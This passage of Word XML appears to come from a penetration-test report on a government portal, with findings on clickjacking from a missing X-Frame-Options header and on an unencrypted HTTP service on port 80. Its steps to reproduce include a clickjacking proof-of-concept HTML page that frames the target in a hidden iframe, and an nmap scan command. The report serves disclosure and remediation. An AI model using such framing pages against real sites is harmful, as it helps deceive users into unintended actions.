          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D7042C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The application's web server does not send the X-Frame-Options HTTP response header, or it is configured incorrectly. This allows an attacker to embed the application's pages within an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> or frame on an arbitrary third-party website. This vulnerability, commonly referred to as Clickjacking or UI Redressing, can be exploited to trick users into clicking on malicious elements hidden beneath or around legitimate interface elements of the framed application, potentially leading to unauthorized actions, disclosure of sensitive information, or session hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC7FCD4" w14:textId="589147A8" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B19C6" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Failure to prevent framing of the portal exposes the government agency to significant risks, particularly given its sensitive nature and compliance requirements under NIST CSF. Attackers could exploit this to overlay malicious content, coercing citizens or employees into unintended actions, such as disclosing personal identifiable information (PII), initiating unauthorized transactions, or changing critical settings. This could lead to severe reputational damage, erode public trust in government services, and potentially incur financial liabilities through data breaches or fraudulent activities. Furthermore, it represents a direct non-compliance with established security best practices for safeguarding government systems and data, potentially leading to audits, penalties, and increased operational costs associated with incident response and remediation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5882B7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9B92C0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0459BBA7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement a robust Content Security Policy (CSP) across the application, specifically utilizing the 'frame-ancestors' directive. This directive provides a modern and flexible way to control which origins can embed the content. Ensure that the CSP is consistently applied to all relevant web pages, especially those handling sensitive user interactions or data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0180985D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D61DF15" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB8046A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure the web server or application framework to include the X-Frame-Options HTTP response header on all pages. The recommended values are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248E4F5F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- DENY: Prevents any domain from framing the content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0287A28B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- SAMEORIGIN: Allows the content to be framed only by pages from the same origin as the page itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2873565C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For maximum security and to prevent framing by any external sites, use X-Frame-Options: DENY. Ensure this header is sent for all HTML pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC4D32D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E64853" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Identify a page on the target application that is intended for user interaction (e.g., login page, form submission page). 2. Examine the HTTP response headers for the identified page using a web proxy (e.g., Burp Suite, OWASP ZAP) or browser developer tools. 3. Observe the absence of the "X-Frame-Options" header, or its presence with an insecure value. 4. Create a simple HTML file on a different domain with the following content (replace "http://target.gov/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vulnerable_page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" with the actual URL):    &lt;html&gt;    &lt;head&gt;&lt;title&gt;Clickjacking Test&lt;/title&gt;&lt;/head&gt;    &lt;body&gt;    &lt;h1&gt;Malicious Site&lt;/h1&gt;    &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>="http://target.gov/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>vulnerable_page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>" width="800" height="600" style="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>position:absolute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>; left:0; top:0; z-index:-1; opacity:0.5;"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;    &lt;/body&gt;    &lt;/html&gt; 5. Host this HTML file on a web server or open it directly in a browser. 6. Verify that the target application's page is successfully embedded within the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>, demonstrating the framing vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35719668" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3F02B" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• OWASP Clickjacking: https://owasp.org/www-community/attacks/Clickjacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69417A09" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• Mozilla Developer Network X-Frame-Options: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF39200" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• CWE-1021: Missing or Incorrect X-Frame-Options Header: https://cwe.mitre.org/data/definitions/1021.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E34BE9A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1880E10E"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314BB3D6"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23469806" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Unrestricted Access to HTTP Service (Port 80)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:left w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
              <w:right w:val="none" w:sz="0" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DC2626"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6642F206" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
              </w:rPr>
              <w:t>HIGH CVSS 8.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="403EE28C"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4297C6C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785EB7A"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7A78042" w14:textId="0945DB57"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-004</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FF0551E"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1FE4486" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="DC2626"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>8.4 (High)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="02746C3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3B1DB78"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93D6B40"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4485C39"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706FF14" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-668</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="2D724245"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76884E6"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FBF3C42"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6776C25"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E7C9BD0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="7A867D0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3652464"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31C335" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="EA580C"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Short-term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21A888B"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EF5107D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="D97706"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Pending</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009B7CCA" w14:paraId="398FDAC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47650EE"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A0B6B8B"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32965FF"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63AD1D0" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5EC9B3D3" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="4F46E5"/>
        </w:pBdr>
        <w:spacing w:before="300" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B049F2F" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The web server operating on the target system exposes an HTTP service via port 80 without redirection to HTTPS. This allows clients to connect and transmit data in plain text.  HTTP is an unencrypted protocol, meaning all communication between the client and the server, including potentially sensitive information such as session cookies, user credentials, or other data, is sent over the network in an easily readable format. This vulnerability increases the risk of man-in-the-middle attacks, eavesdropping, and data interception by malicious actors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5BBFBD" w14:textId="6429E97B" w:rsidR="009B7CCA" w:rsidRDefault="00877518">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D7A4A2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FEF3C7"/>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exposing unencrypted HTTP traffic on a government portal creates significant risks for the organization. Sensitive citizen data or government operational information could be intercepted, leading to severe privacy breaches and a loss of public trust.  Financially, the organization could face substantial fines for non-compliance with data protection regulations like NIST CSF, which mandates secure data transmission. The reputational damage from such an incident could be catastrophic, eroding public confidence in the government's ability to secure critical information and services. This also introduces a point of entry for more sophisticated attacks if the underlying web service is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D38EC7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="16A34A"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="16A34A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F193D69" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>STRATEGIC FIX (Architecture):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4655CC2C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Implement a comprehensive network segmentation strategy to restrict direct access to internal services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64868475" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Establish a policy requiring all public-facing web services to exclusively use HTTPS (HTTP Secure) for all communications, ensuring data encryption in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1794597E" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Integrate a robust Web Application Firewall (WAF) or equivalent security gateway to manage and filter incoming traffic, enforcing secure communication protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139FA36" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="009B7CCA">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1840AF61" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TACTICAL FIX (Code Implementation):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0494D3D7" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- If HTTP access is not strictly required, close port 80 on the firewall and the server configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F8A0A" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Configure the web server (e.g., Apache, Nginx, IIS) to automatically redirect all HTTP traffic from port 80 to HTTPS on port 443. This ensures that even if users attempt to access the site via HTTP, they are securely rerouted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AF7E8C" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Ensure that the SSL/TLS certificate installed for HTTPS is valid, up-to-date, and uses strong cryptographic algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C967D54" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="50"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Review and update network security group (NSG) rules or firewall configurations to explicitly deny inbound connections to port 80 from external networks, allowing only necessary internal communication if applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2452C966" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Steps to Reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17050548" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Open a terminal or command prompt. 2. Execute a port scanning tool like Nmap against the target IP address or hostname. For example: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 80 &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>target_IP_or_hostname</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; 3. Observe that the scan results indicate port 80 is open and listening for connections, confirming the HTTP service exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A8499D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="4" w:color="0369A1"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0369A1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711CD730" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://owasp.org/www-project-top-ten/2021/A05_2021-Security_Misconfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A782D64" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• https://cwe.mitre.org/data/definitions/668.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F725753" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="30"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>• NIST Special Publication 800-53 (Control SC-8 - Transmission Confidentiality and Integrity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108D110D" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3E9FB"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7EF8714F"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72C3F5E2" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>Information Disclosure via Oracle Reports Error Messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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62BCC5AD" w14:textId="77777777" w:rsidR="009B7CCA" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
